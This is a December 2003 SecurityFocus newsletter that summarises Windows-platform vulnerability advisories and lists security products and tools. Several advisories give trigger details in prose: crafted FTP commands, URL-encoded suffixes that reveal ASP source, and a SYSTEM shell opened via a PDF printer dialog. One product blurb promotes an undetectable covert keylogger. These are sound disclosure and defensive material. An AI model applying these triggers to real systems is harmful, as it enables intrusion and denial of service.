SecurityFocus Microsoft Newsletter #168
----------------------------------------

SecurityFocus.com would like to take this opportunity to express our
gratitude for your continued support. In the upcoming year we will improve
and grow so we can continue to provide you with all your essential
security resources.
We would also like to wish you all a great Holiday Season, and a
prosperous New Year.

-The staff at SecurityFocus.com
------------------------------------------------------------------------



I. FRONT AND CENTER
1. Nessus, Part 2: Scanning
2. Low-Level Enumeration With TCP/IP
II. MICROSOFT VULNERABILITY SUMMARY
1. Multiple Vendor IKE Implementation Certificate Authenticity ...
2. DameWare Mini Remote Control Server Pre-Authentication Buffe...
3. XLight FTP Server Tilde Remote Denial Of Service Vulnerabili...
4. Microsoft Internet Explorer Unspecified Remote Compromise Vu...
5. XLight FTP Server Unspecified Remote Directory Traversal Vul...
6. Doro PDF Writer Local Privilege Escalation Vulnerability
7. Ipswitch WS_FTP Server Resource Consumption Remote Denial Of...
8. GoAhead Webserver ASP Script File Source Code Disclosure Vul...
9. ECW-Shop Cat Parameter Cross-Site Scripting Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. TCP/IP Stack Hardening (Thread)
2. FW: TCP/IP Stack Hardening (Thread)
3. FW: Local Security Policy (Thread)
4. Local Security Policy (Thread)
5. Info on deploying ICF on XP sp2 in a managed environ... (Thread)
6. SecurityFocus Microsoft Newsletter #167 (Thread)
7. Blessed Windows Security Templates (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. AccessMaster
2. KeyGhost SX
3. SafeKit
4. SecurDataStor
5. Proactive Windows Security Explorer
6. Outpost Personal Firewall Pro 2.0
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Stealth HTTP Security Scanner v2.0b47
2. IDA Pro - Freeware Edition
3. Enigmail v0.82.5
4. Cryptonit v0.9.1
5. OpenSSL 0.9.7c
6. mrtg v2.10.7
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION


I. FRONT AND CENTER
-------------------
1. Nessus, Part 2: Scanning
By Harry Anderson

This article, the second in the series, provides direction through the
scanning process with Nessus, a powerful open source vulnerability
scanner.

http://www.securityfocus.com/infocus/1753

2. Low-Level Enumeration With TCP/IP
by Randy Williams (Guest Feature)

This paper explains the theory and concept behind many of today's advanced
scanning techniques, shows you what is going on behind the scenes.

http://www.securityfocus.com/guest/24226


II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. Multiple Vendor IKE Implementation Certificate Authenticity ...
BugTraq ID: 9208
Remote: Yes
Date Published: Dec 12 2003
Relevant URL: http://www.securityfocus.com/bid/9208
Summary:
IKE is the Internet Key Exchange protocol. It is used for the negotiation
of authentication and encryption methods and keys during VPN session
initiation.

It has been reported that some default IKE implementations may carry out
insufficient certificate authenticity verification.

The vulnerability lies in the fact that some implementations fail to
thoroughly verify the authenticity of client/server certificates.
Specifically, a client or server will verify the authenticity of a
certificate by ensuring that the Certificate Authority (CA) that signed
it, is the same CA that signed their own certificate. No attempt is made
to verify that the owner of the certificate is trusted.

Exploitation of this issue may be carried out in a number of ways,
depending on the specific IKE implementations. An attacker may impersonate
a client and transmit a certificate subsequent to an IKE and
authentication session being established between the legitimate client and
server. If this were to occur, the impersonated clients certificate would
be erroneously trusted, and IKE would be renegotiated with the attacker,
potentially granting an attacker access to the entire session. The
attacker may also carry out a man-in-the-middle attack by impersonating a
server and initiating an IKE session with a client. Other attacks are also
possible.

It should be noted that the researcher specifically mentioned that certain
vendor VPN clients as being vulnerable, however it was also mentioned that
only some devices/products are vulnerable under some configurations. At
the time of writing, no confirmation has been made by Symantec regarding
which products/devices are directly affected. At this time all vendor VPN
clients have been added as potentially vulnerable. These details will be
modified and/or clarified as further information is made available.

The researcher has explicitly stated that Windows 2000 SP2 and later, as
well as Windows XP are vulnerable to such an implementation. Moreover, it
is said that this implementation may not be modified to allow a differing
CA to sign server and client certificates, potentially making attacks
unavoidable.

The researcher has indirectly stated that the following other vendors may
be affected: Cisco, Nortel, FreeSWAN and Certicom. It should be noted
that other vendors/products may be affected as well, and specific products
listed as vulnerable may not be explicitly affected.

2. DameWare Mini Remote Control Server Pre-Authentication Buffe...
BugTraq ID: 9213
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9213
Summary:
DameWare Mini Remote Control Server is a remote administration tool
distributed and maintained by DameWare Development. It is available for
the Microsoft Windows platform.

A problem has been identified in the handling of pre-authentication
packets by DameWare Mini Remote Control Server. Because of this, it may
be possible for a remote attacker to gain unauthorized access to hosts
using the vulnerable software.

The problem is in the handling of packets containing the
pre-authentication information required by DameWare to authenticate remote
administrators. These packets are usually received through the program
listening port (default TCP 6129), and typically contain the following
information:

Local username
Remote username
Local NetBIOS name
Company Name
Registration Name
Registration Key
Date
Time
Lower case NetBIOS name
IP Address(s) of the client
Version of the remote client

The vulnerability exists when all this information is passed to a function
containing a vulnerable strcpy-like routine. By placing custom,
maliciously crafted data in these variables and sending them in a packet
to the remote host, it is possible to trigger a potentially exploitable
buffer overflow.

**December 21, 2003 - Increased scanning activity, which may be associated
with this issue, has been reported on TCP port 6129. This port is
associated with DameWare Mini Remote Control Server as the listening port.
Exploit code for this issue was released on December 19, 2003. It
contains offsets for many Windows 2000 service packs in English and French
as well as Windows XP SP3.

3. XLight FTP Server Tilde Remote Denial Of Service Vulnerabili...
BugTraq ID: 9215
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9215
Summary:
XLight FTP Server is a commercially available FTP server. It is available
for the Microsoft Windows platform.

A problem has been identified in the XLight FTP Server when handling
certain characters on the commandline. An attacker could take advantage
of this issue to perform a denial of service on vulnerable hosts.

The problem is in the handling of tilde character. When a command for
change of directory (CD) is made to the server and a tilde (~) is supplied
as an argument to the command, the server becomes unstable. It has been
reported that this issue can be exploited to force the server to become
unstable and crash. Manual restart of the server is required to resume
normal operation.

4. Microsoft Internet Explorer Unspecified Remote Compromise Vu...
BugTraq ID: 9216
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9216
Summary:
A reliable source has publicized an Internet Explorer exploit, entitled
1stCleanRc-Xp, which will reportedly allow for installation and
execution of a malicious executable on a vulnerable client system. This
exploit is reported to affect current versions of Internet Explorer, with
all patches applied, on Microsoft Windows 2000/XP.

The exploit appears to use a number of vulnerabilities to cause malicious
Active Content to be interpreted in the Local Zone, resulting in silent
installation and execution of malicious code. The exploit does not
require user interaction other than visiting a malicious web page.

Further technical details are not known at this time and it is likely that
other known issues are used in this exploit, such as those described in
BIDs 9105 and 9107. This BID will be updated when further information is
made available. If multiple new vulnerabilities are being exploited, the
BID will be divided into new individual BIDs for each issue. Existing
BIDs will also be updated appropriately.

It is currently not known if this affects version prior to 6.0.

5. XLight FTP Server Unspecified Remote Directory Traversal Vul...
BugTraq ID: 9219
Remote: Yes
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9219
Summary:
XLight FTP Server is a commercially available FTP server. It is available
for the Microsoft Windows platform.

A problem has been identified in the XLight FTP Server when handling
certain characters on the commandline. Because of this, an attacker could
potentially gain access to sensitive information on vulnerable hosts.

Specific details concerning this issue are not available. What is known
is that it is possible for attackers to gain access to files outside of
the FTP root directory. An attacker taking advantage of this issue could
gain access to files with the same permissions granted to the FTP server
software.

This Bugtraq ID will be further updated when additional information is
available.

6. Doro PDF Writer Local Privilege Escalation Vulnerability
BugTraq ID: 9220
Remote: No
Date Published: Dec 15 2003
Relevant URL: http://www.securityfocus.com/bid/9220
Summary:
Doro PDF writer is a free PDF document creation utility available for
Microsoft Windows platforms.

Doro PDF writer has been reported prone to a vulnerability that may allow
a local user to elevate privileges. The issue presents itself because,
when installed, the Doro PDF writer registers a printer named 'Doro PDF
Writer'. When a document is printed to this handler the print spooler
calls the print filter 'doro.dll'. This DLL is invoked with system
privileges. The DLL library in turn invokes the next stage of execution
'doro.exe'. Doro.exe reportedly spawns a file requestor dialog, because
this dialog inherits SYSTEM privileges, an attacker may invoke any with
SYSTEM privileged access. The attacker may invoke cmd.exe to spawn a
privileged access command shell

A local attacker may exploit this condition to perform arbitrary
unauthorized administrative tasks on the vulnerable system.

It should be noted that although this vulnerability has been reported to
affect Doro PDF writer version 1.13, other versions might also be
affected.

7. Ipswitch WS_FTP Server Resource Consumption Remote Denial Of...
BugTraq ID: 9237
Remote: Yes
Date Published: Dec 17 2003
Relevant URL: http://www.securityfocus.com/bid/9237
Summary:
Ipswitch WS_FTP Server is an FTP implementation that is available for
Microsoft Windows operating systems.

WS_FTP Server has been reported prone to a resource consumption issue that
may lead to a denial of service. It has been reported that a remote
attacker who has sufficient privileges to log into an affected server, may
trigger this vulnerability by passing a sequence of periods . as an
argument of the CWD (Change Working Directory) FTP command. Subsequent
to this action, the attacker will need to create a directory using the FTP
MKD directive. This will reportedly cause the WS_FTP server to
exponentially consume system resources and behave in an unstable manner.

Ultimately a remote attacker may exploit this condition to deny service to
legitimate WS_FTP users.

It should be noted that while this vulnerability has been reported to
affect WS_FTP version 4.02, other versions might also be affected.

8. GoAhead Webserver ASP Script File Source Code Disclosure Vul...
BugTraq ID: 9239
Remote: Yes
Date Published: Dec 17 2003
Relevant URL: http://www.securityfocus.com/bid/9239
Summary:
GoAhead WebServer is an Open Source embedded web server which supports
Active Server Pages, embedded javascript, and SSL authentication and
encryption. It is available for a variety of platforms including Microsoft
Windows and Linux variant operating systems.

A vulnerability has been reported in GoAhead webserver that may result in
the disclosure of ASP script files' source code. The vulnerability exists
due to insufficient sanitization of HTTP requests to the affected server.

A malicious attacker can append '%00', '%2f', '%5c', '/' and ''
characters to the end of a HTTP request for a specific ASP file. This will
result in GoAhead webserver divulging the contents of the requested ASP
script file to the attacker.

Information obtained in this manner may be used by the attacker to launch
further attacks against the vulnerable system.

GoAhead webserver versions up to and including 2.1.7 are reported
vulnerable to this issue.

9. ECW-Shop Cat Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 9244
Remote: Yes
Date Published: Dec 18 2003
Relevant URL: http://www.securityfocus.com/bid/9244
Summary:
ECW-Shop is web-based e-commerce software for Microsoft Windows operating
systems.

ECW-Shop is prone to cross-site scripting attacks. It is reported that
this issue is exploitable via the 'cat' URI parameter of one of the
scripts. The source of the problem is that input is not adequately
sanitized when passed through this parameter, and this input will be
included in dynamically generated web pages. An attacker could exploit
this issue by constructing a malicious link with hostile HTML and script
code embedded in URI parameters. This code may be rendered in the browser
of a user who visits the malicious link. Exploitation could allow for
theft of cookie-based authentication credentials or other attacks.


III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. TCP/IP Stack Hardening (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/348203

2. FW: TCP/IP Stack Hardening (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/348201

3. FW: Local Security Policy (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/348199

4. Local Security Policy (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/348053

5. Info on deploying ICF on XP sp2 in a managed environ... (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/347963

6. SecurityFocus Microsoft Newsletter #167 (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/347663

7. Blessed Windows Security Templates (Thread)
Relevant URL:

http://www.securityfocus.com/archive/88/347509


IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. AccessMaster
By: Evidian Inc.
Platforms: IRIX, Solaris, Windows 2000, Windows 95/98, Windows NT
Relevant URL: http://www.evidian.com/accessmaster/about/index.htm
Summary:

Extending onto a networked world means embracing the unknown. Piracy,
vandalism, industrial espionage... - attacks on companies are doubling
each year. With uniquely integrated security software, AccessMaster
manages and safeguards access to your data, end-to-end, from portals to
legacy, and lets you enforce a single, unified security policy across the
enterprise and beyond.

AccessMaster ensures high security level by federating your existing
security solutions, while ensuring at the same time user's convenience
with Single Sign-On and security officer's ease of administration with
centralized, Ldap-compliant, user and PKI management. In this way,
AccessMaster reduces IT security cost of ownership, with rapid return on
investment.

AccessMaster is recognized by analysts as a leading security suite for
large enterprises today. It was awarded best access control software by
Secure Computing Magazine three years running, in 2000, 2001, and 2002.

2. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:

KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely undetectable
by software scanners and provides you with one of the most powerful
stealth surveillance applications offered anywhere.

Because KeyGhost uses STRONG 128-Bit encryption to store the recorded data
in it?s own internal memory (not on the hard drive), it is impossible for
a network intruder to gain access to any sensitive data stored within the
device.

3. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:

Evidian's SafeKit technology makes it possible to render any application
available 24 hours per day. With no extra hardware: just use your existing
servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to do
is add more standard servers into the cluster. With the load balancing
features of SafeKit, you can distribute applications over multiple
servers. If one system fails completely, the others will continue to serve
your users.

4. SecurDataStor
By: encryptX Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.encryptx.com/products/securdatastor.asp
Summary:

The SecurDataStor product line is designed to provide a comprehensive
software security solution that manages and controls access to sensitive
information that you need to share internally and externally.
SecurDataStor is available in three versions: Basic, Premium, and
Platinum. Depending on the level of security that you need, you can choose
the SecurDataStor product that suits your needs.

With its end-to-end protection of sensitive business information,
SecurDataStor products protect sensitive information when used by the
originator, stored locally on a hard drive or file server, and when
shared. Users can safely share sensitive information across different
Microsoft Windows operating systems, over different network and firewall
technologies, and across different forms of removable media.

5. Proactive Windows Security Explorer
By: Elcomsoft Co. Ltd.
Platforms: Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.elcomsoft.com/pwsex.html#
Summary:

Proactive Windows Security Explorer (PWSEX) is a password security test
tool that's designed to allow Windows NT, Windows 2000, and Windows
XP-based systems administrators to identify and close security holes in
their networks. Proactive Windows Security Explorer helps secure networks
by executing an audit of account passwords, and exposing insecure account
passwords. If it is possible to recover the password within a reasonable
time, the password is considered insecure.

An administrator can also use it to recover any lost password and access a
user's Windows account. Proactive Windows Security Explorer works by
analyzing user password hashes and recovering plain-text passwords.

6. Outpost Personal Firewall Pro 2.0
By: Agnitum
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.outpost.uk.com
Summary:

New Outpost Personal Firewall Pro 2.0 outdistances the award-winning
Outpost Personal Firewall Pro 1.0 on multiple levels, from enhanced
privacy features to ease-of-use. As the foremost security application for
personal computers, Outpost Personal Firewall Pro 2.0 gives you the latest
in personal firewall technology, making version 2.0 the clear security
choice for your system.


V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Stealth HTTP Security Scanner v2.0b47
By: qw erty
Relevant URL: http://www.devhood.com/tools/tool_details.aspx?tool_id=353
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:

Stealth 1.0 scans for 2883 HTTP vulnerabilities. This tool is designed
especially for the system administrators, security consultants and IT
professionals to check the possible security holes and to confirm any
present security vulnerabilities that hackers can exploit. Totally free
for commercial and non-commercial use.

2. IDA Pro - Freeware Edition
By: DataRescue Inc.
Relevant URL: http://www.datarescue.com/idabase
Platforms: DOS, Windows 2000, Windows 95/98, Windows NT
Summary:

The freeware version of the Interactive Disassembler Pro. Supports 80x86
binaries and FLIRT, a unique Fast Library Identification and Recognition
Technology that automagically recognizes standard compiler library calls.
Widely used in COTS validation and hostile code analysis.

3. Enigmail v0.82.5
By: Patrick
Relevant URL: http://enigmail.mozdev.org/thunderbird.html
Platforms: Linux, MacOS, POSIX, UNIX, Windows 2000, Windows 3.x, Windows
95/98, Windows CE, Windows NT, Windows XP
Summary:

Enigmail is a plugin for the mail client of Mozilla and Netscape 7.x
which allows users to access the authentication and encryption features
provided by the popular GnuPG software. Enigmail can encrypt/sign mail
when sending, and can decrypt/authenticate received mail. It can also
import/export public keys. Enigmail supports both the inline PGP format
and the PGP/MIME format, which can be used to encrypt attachments.
Enigmail is cross-platform, although binaries are supplied only for a
limited number of platforms. Enigmail uses inter-process communication to
execute GPG to carry out encryption/authentication.

4. Cryptonit v0.9.1
By: IDEALX
Relevant URL: http://cryptonit.org/
Platforms: Linux, MacOS, Windows 2000, Windows NT, Windows XP
Summary:

Cryptonit is a client side cryptographic tool which allows you to
encrypt/decrypt and sign/verify files with PKI (Public Key Infrastructure)
certificates.

5. OpenSSL 0.9.7c
By: The OpenSSL Project Team
Relevant URL: http://www.openssl.org/
Platforms: UNIX, Windows NT
Summary:

The OpenSSL Project is a collaborative effort to develop a robust,
commercial-grade, fully featured, and Open Source toolkit implementing the
Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as
well as a full-strength general-purpose cryptography library.

6. mrtg v2.10.7
By: Tobias Oetiker
Relevant URL: http://people.ee.ethz.ch/~oetiker/webtools/mrtg/
Platforms: POSIX, Windows 2000, Windows NT
Summary:

The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic
load on network-links. MRTG generates HTML pages containing GIF/PNG images
which provide a live visual representation of this traffic.


VI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to
[email protected] from the subscribed address. The
contents of the subject or message body do not matter. You will receive a
confirmation request message to which you will have to answer.
Alternatively you can also visit http://www.securityfocus.com/newsletters
and unsubscribe via the website.

If your email address has changed email [email protected] and
ask to be manually removed.


VII. SPONSOR INFORMATION
-----------------------
SecurityFocus.com would like to take this opportunity to express our
gratitude for your continued support. In the upcoming year we will improve
and grow so we can continue to provide you with all your essential
security resources.
We would also like to wish you all a great Holiday Season, and a
prosperous New Year.

-The staff at SecurityFocus.com
------------------------------------------------------------------------